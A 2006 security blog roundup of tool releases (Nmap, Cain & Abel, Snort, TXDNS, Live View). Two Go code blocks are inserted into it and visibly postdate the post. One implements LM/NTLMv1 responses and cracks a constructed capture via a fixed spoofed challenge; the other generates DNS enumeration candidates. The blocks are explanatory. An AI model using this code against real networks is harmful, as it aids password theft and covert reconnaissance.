Monday, December 4, 2006

Tools of the Trade - Now w/High Protein Soy!

1) Insecure.org has released Nmap 4.20RC2. Updates include the following:
  • Integrated all of your OS detection submissions since RC1. The DB has increased 13% to 214 fingerprints. Please keep them coming! New fingerprints include versions of z/OS, OpenBSD, Linux, AIX, FreeBSD, Cisco CatOS, IPSO firewall, and a slew of printers and misc. devices. We also got our first Windows 95 fingerprint, submitted anonymously of course :).
  • Fixed (I hope) the "getinterfaces: intf_loop() failed" error which was seen on Windows Vista. The problem was apparently in intf-win32.c of libdnet (need to define MIB_IF_TYPE_MAX to MAX_IF_TYPE rather than 32). Thanks to Dan Griffin (dan(a)jwsecure.com) for tracking this down!
  • Applied a couple minor bug fixes from Marek Majkowski to IP options support (which he previously added) and packet tracing.
  • Incorporated SLNP (Simple Library Network Protocol) version detection support. Thanks to Tibor Csogor (tibi(a)tiborius.net) for the patch.

2) Oxid.it recently released Cain & Abel 4.2. Updates include the following:

  • Cain's MitM NTLM Challenge Spoofing (requires APR to be active and a MitM condition between victim hosts). You can now spoof server challenges in NTLM authentications; this feature enables the use of RainbowTables for cracking network hashes. WARNING !!! Enabling Challenge Spoofing causes users to fail authentications, so use it carefully.
  • NTLM Session Security authentications downgrade to LM&NTLMv1. The following protocols are supported: SMB, DCE/RPC, TDS, HTTP, POP3, IMAP, SMTP.
  • LM + spoofed challenge Hashes Cryptanalysis via Sorted Rainbow Tables.
  • HALFLM + spoofed challenge Hashes Cryptanalysis via Sorted Rainbow Tables.
  • NTLM + spoofed challenge Hashes Cryptanalysis via Sorted Rainbow Tables.
  • New types of RainbowTables have been added to Winrtgen v2.3. "lmchall" and "ntlmchall" tables can be used against LM and NTLM response hashes for spoofed challenges (default: 0x1122334455667788). "halflmchall" tables can be used against the first 8 bytes of LM response hashes for spoofed challenges to recover the first 7 characters of the original password.
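What the challenge-spoofing feature relies on, as an added example written for this post (it is not Cain's or Winrtgen's code): the LM hash and the LMv1/NTLMv1 response function, built on Go's standard-library DES. Once the man-in-the-middle forces the constant 0x1122334455667788 quoted above into every server challenge, the 24-byte response depends on the password hash alone, so a table precomputed once answers every capture; the toy map below stands in for such a table, and the wordlist and "sniffed" response are constructed. The HALFLM case follows from the key layout: the first 8 response bytes are produced by the first 7 hash bytes, which come from characters 1-7 only. NTLMv1 applies the same response function to the NT (MD4) hash; since the Go standard library has no MD4, this block takes that hash as a byte input rather than computing it.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// Cain's default spoofed challenge. With the MitM forcing this constant into
// every server challenge, each response is a function of the hash alone.
var SpoofedChallenge = []byte{0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88}

// desKeyFrom7 spreads 56 key bits over 8 bytes, 7 bits per byte with the low
// bit left for parity (Go's crypto/des ignores parity).
func desKeyFrom7(k7 []byte) []byte {
	var v uint64
	for _, b := range k7 {
		v = v<<8 | uint64(b)
	}
	key := make([]byte, 8)
	for i := range key {
		key[i] = byte((v>>(49-7*uint(i)))&0x7F) << 1
	}
	return key
}

func desEncrypt(k7, block []byte) []byte {
	c, err := des.NewCipher(desKeyFrom7(k7))
	if err != nil {
		panic(err) // only reachable with a wrong key length
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// LMHash: uppercase, pad or cut to 14 bytes, DES-encrypt the constant
// "KGS!@#$%" under each 7-byte half. Each half depends on only 7 characters.
func LMHash(password string) []byte {
	pw := make([]byte, 14)
	copy(pw, strings.ToUpper(password))
	magic := []byte("KGS!@#$%")
	return append(desEncrypt(pw[:7], magic), desEncrypt(pw[7:], magic)...)
}

// ChallengeResponse is the LMv1/NTLMv1 response function: the 8-byte server
// challenge DES-encrypted under three 7-byte keys cut from the 16-byte hash
// padded with five zero bytes. NTLMv1 feeds it the NT hash instead of the LM one.
func ChallengeResponse(hash16, challenge []byte) []byte {
	key21 := make([]byte, 21)
	copy(key21, hash16)
	var resp []byte
	for i := 0; i < 3; i++ {
		resp = append(resp, desEncrypt(key21[i*7:i*7+7], challenge)...)
	}
	return resp
}

// HalfLMResponse is what a "halflmchall" table targets: the first 8 response
// bytes come from hash bytes 0-6, i.e. from password characters 1-7 only.
func HalfLMResponse(password string, challenge []byte) []byte {
	return ChallengeResponse(LMHash(password), challenge)[:8]
}

// BuildLMTable is a toy stand-in for a precomputed "lmchall" table: full LM
// response under one fixed challenge -> candidate password. The precomputation
// is reusable across captures only because the challenge never changes.
func BuildLMTable(candidates []string, challenge []byte) map[string]string {
	t := make(map[string]string, len(candidates))
	for _, c := range candidates {
		t[hex.EncodeToString(ChallengeResponse(LMHash(c), challenge))] = c
	}
	return t
}

// LookupResponse returns the password behind a sniffed response, or "" on a miss.
func LookupResponse(table map[string]string, response []byte) string {
	return table[hex.EncodeToString(response)]
}

func main() {
	words := []string{"password", "letmein", "Summer2006", "changeme"} // constructed wordlist
	table := BuildLMTable(words, SpoofedChallenge)

	sniffed := ChallengeResponse(LMHash("Summer2006"), SpoofedChallenge) // constructed capture
	fmt.Println("spoofed challenge hit:", LookupResponse(table, sniffed))

	// Under a genuinely random challenge the same table is useless.
	random := []byte{0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef}
	fmt.Printf("random challenge hit: %q\n",
		LookupResponse(table, ChallengeResponse(LMHash("Summer2006"), random)))

	// HALFLM: same first 7 characters -> same first 8 response bytes.
	fmt.Printf("halflm %x == %x\n", HalfLMResponse("Summer2006", SpoofedChallenge),
		HalfLMResponse("Summer2!XYZ", SpoofedChallenge))
}
```

The two properties the rainbow tables exploit are visible in the code: the spoofed challenge turns an interactive protocol into an unsalted, deterministic hash of the password, and DES key boundaries (7, 14 and 21 bytes) split that hash so the first block leaks the first seven characters on its own.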

3) Snort 2.6.1.1 was released. It fixes a problem with Snort using high CPU and potentially reprocessing the same TCP reassembled packets at session end or on a TCP ACK of only part of a packet.

4) On Nov 16th, VMware Workstation 5.5.3, Build 34685 was released. It fixed a whole heap of bugs related to Linux. Of course, you must already have a license to upgrade, but you know that. =)

5) On Nov 11th, Arley Silveira released TXDNS 2.0.0. TXDNS is an aggressive multithreaded Win32 DNS digger capable of putting thousands of DNS queries per minute on the wire. Its main goal is to expose a domain namespace through a number of techniques: typos, TLD rotation, dictionary attack and brute force.
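The enumeration techniques listed above, as an added example that is not TXDNS's code: a candidate generator covering typo variants (omission, doubled character, adjacent transposition), TLD rotation and dictionary subdomains, followed by a pass that keeps the names that resolve. The resolver is abstracted so the block runs offline against a constructed zone; a real run would pass a wrapper around net.LookupHost instead.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
)

// Resolver abstracts the lookup so the example runs offline; in practice
// wrap net.LookupHost and return err == nil.
type Resolver func(name string) bool

// Typos returns the single-character omission, doubling and adjacent
// transposition variants of a label, the kind of names users mistype.
func Typos(label string) []string {
	seen := map[string]bool{}
	var out []string
	add := func(s string) {
		if s != "" && s != label && !seen[s] {
			seen[s] = true
			out = append(out, s)
		}
	}
	for i := 0; i < len(label); i++ {
		add(label[:i] + label[i+1:])             // omission
		add(label[:i] + label[i:i+1] + label[i:]) // doubled character
		if i+1 < len(label) {
			add(label[:i] + label[i+1:i+2] + label[i:i+1] + label[i+2:]) // transposition
		}
	}
	return out
}

// Candidates builds the namespace to probe around "label.tld": typo variants
// under the same TLD, the same label under other TLDs, and dictionary-word
// subdomains beneath the real name.
func Candidates(label, tld string, tlds, words []string) []string {
	var c []string
	for _, t := range Typos(label) {
		c = append(c, t+"."+tld)
	}
	for _, t := range tlds {
		if t != tld {
			c = append(c, label+"."+t)
		}
	}
	for _, w := range words {
		c = append(c, w+"."+label+"."+tld)
	}
	return c
}

// Dig resolves every candidate and returns the ones that exist, sorted.
func Dig(candidates []string, resolve Resolver) []string {
	var hits []string
	for _, name := range candidates {
		if resolve(name) {
			hits = append(hits, name)
		}
	}
	sort.Strings(hits)
	return hits
}

func main() {
	// Constructed zone standing in for real DNS answers.
	zone := map[string]bool{"www.example.com": true, "mail.example.com": true,
		"exmaple.com": true, "example.net": true}
	resolve := func(n string) bool { return zone[strings.ToLower(n)] }
	cands := Candidates("example", "com", []string{"com", "net", "org"}, []string{"www", "mail", "vpn"})
	fmt.Println(len(cands), "candidates; hits:", Dig(cands, resolve))
}
```

Brute force is the same loop with an exhaustive label generator in place of the word list; the query rate TXDNS advertises comes from issuing these lookups concurrently rather than one at a time as above.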

6) On the forensics tool front, Live View 0.5 was released not long ago. Live View is a Java-based graphical forensics tool that creates a VMware virtual machine out of a raw (dd-style) disk image or physical disk. This allows the forensic examiner to "boot up" the image or disk and gain an interactive, user-level perspective of the environment, all without modifying the underlying image or disk. Because all changes made to the disk are written to a separate file, the examiner can instantly revert all of his or her changes back to the original pristine state of the disk. The end result is that one need not create extra "throw away" copies of the disk or image to create the virtual machine.
